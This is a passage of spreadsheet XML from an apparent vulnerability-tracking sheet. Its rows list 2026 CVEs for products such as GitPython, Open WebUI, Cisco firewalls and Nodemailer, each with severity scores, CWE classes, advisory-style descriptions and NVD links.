      <c r="Q278" s="5" t="inlineStr">
        <is>
          <t>CWE-1289</t>
        </is>
      </c>
      <c r="R278" s="5" t="inlineStr">
        <is>
          <t>Improper validation of pod identifier uniqueness in aws-network-policy-agent in Amazon EKS Network Policy Agent before v1.4.0 might allow an authenticated remote user to bypass NetworkPolicy enforcement on co-located pods in other namespaces via crafted pod and namespace names that produce pod identifier collisions.
To remediate this issue, users should upgrade to Amazon EKS Network Policy Agent 1.4.0 or later and Amazon VPC CNI Managed Add-on v1.22.4 or later (which includes Network Policy Agent v1.4.0).</t>
        </is>
      </c>
      <c r="S278" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86831</t>
        </is>
      </c>
    </row>
    <row r="279">
      <c r="A279" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B279" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C279" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87817</t>
        </is>
      </c>
      <c r="D279" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E279" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F279" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G279" s="5" t="inlineStr"/>
      <c r="H279" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I279" s="5" t="inlineStr"/>
      <c r="J279" s="5" t="inlineStr"/>
      <c r="K279" s="5" t="inlineStr">
        <is>
          <t>gitpython_project:gitpython</t>
        </is>
      </c>
      <c r="L279" s="5" t="inlineStr"/>
      <c r="M279" s="5" t="inlineStr"/>
      <c r="N279" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O279" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P279" s="5" t="inlineStr"/>
      <c r="Q279" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R279" s="5" t="inlineStr">
        <is>
          <t>GitPython before 3.1.60 fails to properly validate the git directory location, allowing attackers to impersonate the git directory using tracked files like gitdir, commondir, and HEAD. Attackers can execute arbitrary code by placing a malicious pre-commit hook in the tracked hooks directory that executes when a victim calls index.commit() on a cloned or opened repository.</t>
        </is>
      </c>
      <c r="S279" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87817</t>
        </is>
      </c>
    </row>
    <row r="280">
      <c r="A280" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B280" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C280" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87995</t>
        </is>
      </c>
      <c r="D280" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E280" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F280" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G280" s="5" t="inlineStr"/>
      <c r="H280" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I280" s="5" t="inlineStr"/>
      <c r="J280" s="5" t="inlineStr"/>
      <c r="K280" s="5" t="inlineStr">
        <is>
          <t>openwebui:open_webui</t>
        </is>
      </c>
      <c r="L280" s="5" t="inlineStr"/>
      <c r="M280" s="5" t="inlineStr"/>
      <c r="N280" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O280" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P280" s="5" t="inlineStr"/>
      <c r="Q280" s="5" t="inlineStr">
        <is>
          <t>CWE-1021, CWE-79</t>
        </is>
      </c>
      <c r="R280" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.8.11 until 0.11.1, src/lib/components/chat/FileNav/PortPreview.svelte rendered terminal port content in an iframe sandbox containing both allow-scripts and allow-same-origin. Because the terminal proxy serves that content from the Open WebUI origin, an authenticated user with access to a shared terminal server could host script on a previewed port and take over a victim's account when the victim opened the preview. This issue is fixed in version 0.11.1.</t>
        </is>
      </c>
      <c r="S280" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87995</t>
        </is>
      </c>
    </row>
    <row r="281">
      <c r="A281" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B281" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C281" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88263</t>
        </is>
      </c>
      <c r="D281" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E281" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F281" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G281" s="5" t="inlineStr"/>
      <c r="H281" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I281" s="5" t="inlineStr"/>
      <c r="J281" s="5" t="inlineStr"/>
      <c r="K281" s="5" t="inlineStr"/>
      <c r="L281" s="5" t="inlineStr"/>
      <c r="M281" s="5" t="inlineStr"/>
      <c r="N281" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O281" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P281" s="5" t="inlineStr"/>
      <c r="Q281" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R281" s="5" t="inlineStr">
        <is>
          <t>XikeStor Layer3 switches miss authentication for downloading configuration data. Unauthenticated attacker may retrieve the configuration data containing network configurations and passwords to operate the affected product improperly or to exploit the affected product as a jump host.</t>
        </is>
      </c>
      <c r="S281" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88263</t>
        </is>
      </c>
    </row>
    <row r="282">
      <c r="A282" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B282" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C282" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88817</t>
        </is>
      </c>
      <c r="D282" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E282" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F282" s="5" t="inlineStr">
        <is>
          <t>cert@airbus.com</t>
        </is>
      </c>
      <c r="G282" s="5" t="inlineStr"/>
      <c r="H282" s="5" t="inlineStr"/>
      <c r="I282" s="5" t="inlineStr"/>
      <c r="J282" s="5" t="inlineStr"/>
      <c r="K282" s="5" t="inlineStr"/>
      <c r="L282" s="5" t="inlineStr"/>
      <c r="M282" s="5" t="inlineStr"/>
      <c r="N282" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O282" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P282" s="5" t="inlineStr"/>
      <c r="Q282" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-284</t>
        </is>
      </c>
      <c r="R282" s="5" t="inlineStr">
        <is>
          <t>An authenticated, non-guest user of Curiosity Workspace could enroll themselves as an administrator and member of an existing access group without an invitation or approval.
It did not grant application-wide administrator privileges, and the vulnerability could not be used to obtain root access to the application or its underlying host.</t>
        </is>
      </c>
      <c r="S282" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88817</t>
        </is>
      </c>
    </row>
    <row r="283">
      <c r="A283" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B283" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C283" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90776</t>
        </is>
      </c>
      <c r="D283" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E283" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F283" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G283" s="5" t="inlineStr"/>
      <c r="H283" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I283" s="5" t="inlineStr"/>
      <c r="J283" s="5" t="inlineStr"/>
      <c r="K283" s="5" t="inlineStr"/>
      <c r="L283" s="5" t="inlineStr"/>
      <c r="M283" s="5" t="inlineStr"/>
      <c r="N283" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O283" s="5" t="inlineStr">
        <is>
          <t>2026-09-13</t>
        </is>
      </c>
      <c r="P283" s="5" t="inlineStr"/>
      <c r="Q283" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="R283" s="5" t="inlineStr">
        <is>
          <t>Nodemailer versions 9.1.0 through 10.0.4 contain a quadratic time complexity vulnerability in the addressparser component when parsing email addresses with RFC 5322 comments. Attackers can craft malicious email headers with comment-separated atoms to consume excessive CPU and block the Node.js event loop for several seconds, causing denial of service.</t>
        </is>
      </c>
      <c r="S283" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90776</t>
        </is>
      </c>
    </row>
    <row r="284">
      <c r="A284" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B284" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C284" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92355</t>
        </is>
      </c>
      <c r="D284" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E284" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F284" s="5" t="inlineStr">
        <is>
          <t>security@octopus.com</t>
        </is>
      </c>
      <c r="G284" s="5" t="inlineStr"/>
      <c r="H284" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I284" s="5" t="inlineStr"/>
      <c r="J284" s="5" t="inlineStr"/>
      <c r="K284" s="5" t="inlineStr"/>
      <c r="L284" s="5" t="inlineStr"/>
      <c r="M284" s="5" t="inlineStr"/>
      <c r="N284" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O284" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P284" s="5" t="inlineStr"/>
      <c r="Q284" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R284" s="5" t="inlineStr">
        <is>
          <t>In affected versions of Octopus Server, a user with permission to modify non built-in external feeds could exploit a path traversal flaw to overwrite arbitrary files on the server, which in some configurations could lead to remote code execution.</t>
        </is>
      </c>
      <c r="S284" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92355</t>
        </is>
      </c>
    </row>
    <row r="285">
      <c r="A285" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B285" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C285" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19535</t>
        </is>
      </c>
      <c r="D285" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E285" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F285" s="5" t="inlineStr">
        <is>
          <t>prodsec@nozominetworks.com</t>
        </is>
      </c>
      <c r="G285" s="5" t="inlineStr"/>
      <c r="H285" s="5" t="inlineStr"/>
      <c r="I285" s="5" t="inlineStr"/>
      <c r="J285" s="5" t="inlineStr"/>
      <c r="K285" s="5" t="inlineStr"/>
      <c r="L285" s="5" t="inlineStr"/>
      <c r="M285" s="5" t="inlineStr"/>
      <c r="N285" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O285" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P285" s="5" t="inlineStr"/>
      <c r="Q285" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="R285" s="5" t="inlineStr">
        <is>
          <t>Nozomi Networks Labs identified a CWE-352: Cross-Site Request Forgery (CSRF) vulnerability in the LuCI administrative web interface of Advantech EKI-1242IEIMS in firmware version V1.06.01 that allows a remote unauthenticated attacker to perform unauthorized state-changing requests on behalf of a logged-in administrator, enabling unauthorized access to privileged management functions.</t>
        </is>
      </c>
      <c r="S285" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19535</t>
        </is>
      </c>
    </row>
    <row r="286">
      <c r="A286" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B286" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C286" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20135</t>
        </is>
      </c>
      <c r="D286" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E286" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F286" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G286" s="5" t="inlineStr"/>
      <c r="H286" s="5" t="inlineStr"/>
      <c r="I286" s="5" t="inlineStr"/>
      <c r="J286" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K286" s="5" t="inlineStr"/>
      <c r="L286" s="5" t="inlineStr"/>
      <c r="M286" s="5" t="inlineStr"/>
      <c r="N286" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O286" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P286" s="5" t="inlineStr"/>
      <c r="Q286" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="R286" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the TLS 1.3 implementation in Cisco Secure Firewall Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition.
This vulnerability is due to improper buffer management during the TLS 1.3 connection. An attacker could exploit this vulnerability by sending a crafted TLS 1.3 packet to an affected system through a TLS 1.3-enabled listening socket. A successful exploit could allow the attacker to cause the LINA process to crash, which would cause the device to reload. The reload can happen before or after authentication of the connection.Note:&amp;nbsp;TLS 1.3 connections include both data traffic and user-management traffic.</t>
        </is>
      </c>
      <c r="S286" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20135</t>
        </is>
      </c>
    </row>
    <row r="287">
      <c r="A287" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B287" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C287" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20154</t>
        </is>
      </c>
      <c r="D287" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E287" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F287" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G287" s="5" t="inlineStr"/>
      <c r="H287" s="5" t="inlineStr"/>
      <c r="I287" s="5" t="inlineStr"/>
      <c r="J287" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K287" s="5" t="inlineStr"/>
      <c r="L287" s="5" t="inlineStr"/>
      <c r="M287" s="5" t="inlineStr"/>
      <c r="N287" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O287" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P287" s="5" t="inlineStr"/>
      <c r="Q287" s="5" t="inlineStr">
        <is>
          <t>CWE-835</t>
        </is>
      </c>
      <c r="R287" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the system rate-limiting process for syslog message 419002 of Cisco Secure Firewall Adaptive Security Appliance (ASA) Software and Cisco Secure Firewall Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause high CPU utilization on an affected device, resulting in a denial of service (DoS) condition.
This vulnerability is due to improper rate limiting for syslog message 419002. An attacker could exploit this vulnerability by sending a flood of TCP synchronization (SYN) packets to an affected device. A successful exploit could allow the attacker to cause high CPU utilization, resulting in performance degradation.&amp;nbsp;</t>
        </is>
      </c>
      <c r="S287" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20154</t>
        </is>
      </c>
    </row>
    <row r="288">
      <c r="A288" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B288" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C288" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20249</t>
        </is>
      </c>
      <c r="D288" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E288" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F288" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G288" s="5" t="inlineStr"/>
      <c r="H288" s="5" t="inlineStr"/>
      <c r="I288" s="5" t="inlineStr"/>
      <c r="J288" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K288" s="5" t="inlineStr"/>
      <c r="L288" s="5" t="inlineStr"/>
      <c r="M288" s="5" t="inlineStr"/>
      <c r="N288" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O288" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P288" s="5" t="inlineStr"/>
      <c r="Q288" s="5" t="inlineStr">
        <is>
          <t>CWE-704</t>
        </is>
      </c>
      <c r="R288" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the certification authentication feature of Internet Key Exchange version 2 (IKEv2)&amp;nbsp;for Cisco Secure Firewall Adaptive Security Appliance (ASA) Software and Cisco Secure Firewall Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause an affected device to reload unexpectedly.
This vulnerability is due to a logic error during the certificate authentication phase of the IKEv2 connection setup. An attacker could exploit this vulnerability by attempting to establish an IKEv2 VPN connection with a crafted certificate. A successful exploit could allow the attacker to cause the IKEv2 process to crash, causing a denial of service (DoS) condition.</t>
        </is>
      </c>
      <c r="S288" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20249</t>
        </is>
      </c>
    </row>
    <row r="289">
      <c r="A289" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B289" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C289" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20250</t>
        </is>
      </c>
      <c r="D289" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E289" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F289" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G289" s="5" t="inlineStr"/>
      <c r="H289" s="5" t="inlineStr"/>
      <c r="I289" s="5" t="inlineStr"/>
      <c r="J289" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K289" s="5" t="inlineStr"/>
      <c r="L289" s="5" t="inlineStr"/>
      <c r="M289" s="5" t="inlineStr"/>
      <c r="N289" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O289" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P289" s="5" t="inlineStr"/>
      <c r="Q289" s="5" t="inlineStr">
        <is>
          <t>CWE-772</t>
        </is>
      </c>
      <c r="R289" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in Datagram TLS (DTLS) message handling of Cisco Secure Firewall Adaptive Security Appliance (ASA) Software and Cisco Secure Firewall Threat Defense (FTD) Software for Cisco Secure Firewall 3100 Series and 4200 Series devices could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device.
This vulnerability is due to improper resource management when processing certain DTLS messages. An attacker could exploit this vulnerability by sending a crafted stream of DTLS traffic to an affected device. A successful exploit could allow the attacker to cause the device to reload, resulting in a DoS condition.</t>
        </is>
      </c>
      <c r="S289" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20250</t>
        </is>
      </c>
    </row>
    <row r="290">
      <c r="A290" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B290" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C290" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20295</t>
        </is>
      </c>
      <c r="D290" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E290" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F290" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G290" s="5" t="inlineStr"/>
      <c r="H290" s="5" t="inlineStr"/>
      <c r="I290" s="5" t="inlineStr"/>
      <c r="J290" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K290" s="5" t="inlineStr"/>
      <c r="L290" s="5" t="inlineStr"/>
      <c r="M290" s="5" t="inlineStr"/>
      <c r="N290" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O290" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P290" s="5" t="inlineStr"/>
      <c r="Q290" s="5" t="inlineStr">
        <is>
          <t>CWE-789</t>
        </is>
      </c>
      <c r="R290" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the sftunnel inter-device communication protocol of Cisco Secure FMC Software and Cisco Secure FTD Software could allow an unauthenticated, remote attacker to exhaust the available memory of an affected device.
This vulnerability is due to improper management of memory resources during sftunnel TLS connection setup. An attacker could exploit this vulnerability by sending crafted sftunnel TLS frames to an affected device&amp;nbsp;during the connection setup. A successful exploit could allow the attacker to exhaust the available memory on the affected device, which could result in a DoS condition.</t>
        </is>
      </c>
      <c r="S290" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20295</t>
        </is>
      </c>
    </row>
    <row r="291">
      <c r="A291" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B291" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C291" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20352</t>
        </is>
      </c>
      <c r="D291" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E291" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F291" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G291" s="5" t="inlineStr"/>
      <c r="H291" s="5" t="inlineStr"/>
      <c r="I291" s="5" t="inlineStr"/>
      <c r="J291" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K291" s="5" t="inlineStr"/>
      <c r="L291" s="5" t="inlineStr"/>
      <c r="M291" s="5" t="inlineStr"/>
      <c r="N291" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O291" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P291" s="5" t="inlineStr"/>
      <c r="Q291" s="5" t="inlineStr">
        <is>
          <t>CWE-119</t>
        </is>
      </c>
      <c r="R291" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the RADIUS feature of Cisco Identity Services Engine (ISE) could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device.
This vulnerability is due to improper handling of certain RADIUS requests. An attacker could exploit this vulnerability by sending a crafted RADIUS request directly to an affected device. A successful exploit could allow the attacker to cause the ISE node to become unavailable. For single node deployments in that condition, endpoints that have not already authenticated would be unable to access the network until the&amp;nbsp;node comes back up on its own.</t>
        </is>
      </c>
      <c r="S291" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20352</t>
        </is>
      </c>
    </row>
    <row r="292">
      <c r="A292" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B292" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C292" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-4129</t>
        </is>
      </c>
      <c r="D292" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E292" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F292" s="5" t="inlineStr">
        <is>
          <t>security@ni.com</t>
        </is>
      </c>
      <c r="G292" s="5" t="inlineStr"/>
      <c r="H292" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I292" s="5" t="inlineStr"/>
      <c r="J292" s="5" t="inlineStr"/>
      <c r="K292" s="5" t="inlineStr"/>
      <c r="L292" s="5" t="inlineStr"/>
      <c r="M292" s="5" t="inlineStr"/>
      <c r="N292" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O292" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P292" s="5" t="inlineStr"/>
      <c r="Q292" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R292" s="5" t="inlineStr">
        <is>
          <t>There is an improper access control vulnerability in NI SystemLink that may allow an authenticated user with limited privileges to access host operating system files and directories that should be restricted. This vulnerability affects NI SystemLink and NI SystemLink Server versions prior to 2026 Q3.</t>
        </is>
      </c>
      <c r="S292" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-4129</t>
        </is>
      </c>
    </row>
    <row r="293">
      <c r="A293" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B293" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C293" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54628</t>
        </is>
      </c>
      <c r="D293" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E293" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F293" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G293" s="5" t="inlineStr"/>
      <c r="H293" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I293" s="5" t="inlineStr"/>
      <c r="J293" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="K293" s="5" t="inlineStr"/>
      <c r="L293" s="5" t="inlineStr"/>
      <c r="M293" s="5" t="inlineStr"/>
      <c r="N293" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O293" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P293" s="5" t="inlineStr"/>
      <c r="Q293" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-441, CWE-862, CWE-918</t>
        </is>
      </c>
      <c r="R293" s="5" t="inlineStr">
        <is>
          <t>Anyquery is an SQL query engine built on top of SQLite. Prior to 0.4.5, anyquery server exposes URL-capable SQLite virtual table modules such as json_reader and log_reader through its unauthenticated MySQL-compatible server port without restricting outbound destinations. A remote attacker can provide a loopback, private-network, or link-local cloud metadata URL, causing go-getter in the Anyquery server process to fetch the selected resource and expose its response as queryable table data. This permits internal network probing, access to internal APIs, and disclosure of cloud credentials; low-integrity impact is possible when a reached internal API performs state-changing actions. This issue is fixed in version 0.4.5.</t>
        </is>
      </c>
      <c r="S293" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54628</t>
        </is>
      </c>
    </row>
    <row r="294">
      <c r="A294" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B294" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C294" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56100</t>
        </is>
      </c>
      <c r="D294" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E294" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F294" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G294" s="5" t="inlineStr"/>
      <c r="H294" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I294" s="5" t="inlineStr"/>
      <c r="J294" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="K294" s="5" t="inlineStr"/>
      <c r="L294" s="5" t="inlineStr"/>
      <c r="M294" s="5" t="inlineStr"/>
      <c r="N294" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O294" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
